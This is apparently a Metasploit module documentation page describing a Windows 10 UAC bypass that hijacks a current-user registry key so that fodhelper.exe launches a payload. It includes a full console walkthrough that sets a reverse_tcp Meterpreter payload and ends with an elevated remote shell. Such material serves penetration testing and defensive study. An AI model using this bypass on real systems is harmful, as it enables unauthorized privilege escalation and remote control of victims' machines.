adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
94de45d856b7d4ea32456bbdc7531af67bfbcaa1
metasploit-gs/documentation/modules/exploit/windows/local/bypassuac_fodhelper.md
T

93 lines
3.4 KiB
Markdown
Raw Blame History

## Vulnerable Application
### Introduction
This module will bypass Windows 10 UAC by hijacking a special key in the Registry under
the current user hive, and inserting a custom command that will get invoked when
the Windows fodhelper.exe application is launched. It will spawn a second shell that has the UAC
flag turned off.
This module modifies a registry key, but cleans up the key once the payload has
been invoked.
The module does not require the architecture of the payload to match the OS. If
specifying EXE::Custom your DLL should call ExitProcess() after starting your
payload in a separate process.
## Usage
You'll first need to obtain a session on the target system.
Next, once the module is loaded, one simply needs to set the ```payload``` and ```session``` options.
The module use an hardcoded timeout of 5 seconds during which it expects fodhelper.exe to be launched on the target system.
On slower system this may be too short, resulting in no session being created. In this case disable the automatic payload handler (`set DISABLEPAYLOADHANDLER true`)
and manually create a job handler corresponding to the payload.
## Scenarios
```
msf >
[*] Sending stage (1189423 bytes) to 192.168.50.4
[*] Meterpreter session 11 opened (192.168.50.1:4444 -> 192.168.50.4:1654) at 2017-05-22 19:10:43 +0100
msf > sessions -i 11
[*] Starting interaction with 11...
meterpreter > shell
Process 9496 created.
Channel 1 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Users\sasha\Desktop>whoami /all | findstr /C:"Mandatory Label"
whoami /all | findstr /C:"Mandatory Label"
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
C:\Users\sasha\Desktop>exit
exit
meterpreter >
Background session 11? [y/N]
msf > use exploit/windows/local/bypassuac_fodhelper
msf exploit(bypassuac_fodhelper) > set SESSION 11
SESSION => 11
msf exploit(bypassuac_fodhelper) > show targets
Exploit targets:
Id Name
-- ----
0 Windows x86
1 Windows x64
msf exploit(bypassuac_fodhelper) > set target 0
target => 0
msf exploit(bypassuac_fodhelper) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(bypassuac_fodhelper) > run
[*] Started reverse TCP handler on 192.168.50.1:4445
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Configuring payload and stager registry keys ...
[*] Executing payload: C:\WINDOWS\system32\cmd.exe /c C:\WINDOWS\System32\fodhelper.exe
[*] Sending stage (957487 bytes) to 192.168.50.4
[*] Meterpreter session 12 opened (192.168.50.1:4445 -> 192.168.50.4:1655) at 2017-05-22 19:12:03 +0100
[*] Cleaining up registry keys ...
meterpreter > shell
Process 4076 created.
Channel 1 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>whoami /all | findstr /C:"Mandatory Label"
whoami /all | findstr /C:"Mandatory Label"
ERROR: Unable to get user claims information.
Mandatory Label\High Mandatory Level Label S-1-16-12288
C:\WINDOWS\system32>
```
Reference in New Issue View Git Blame Copy Permalink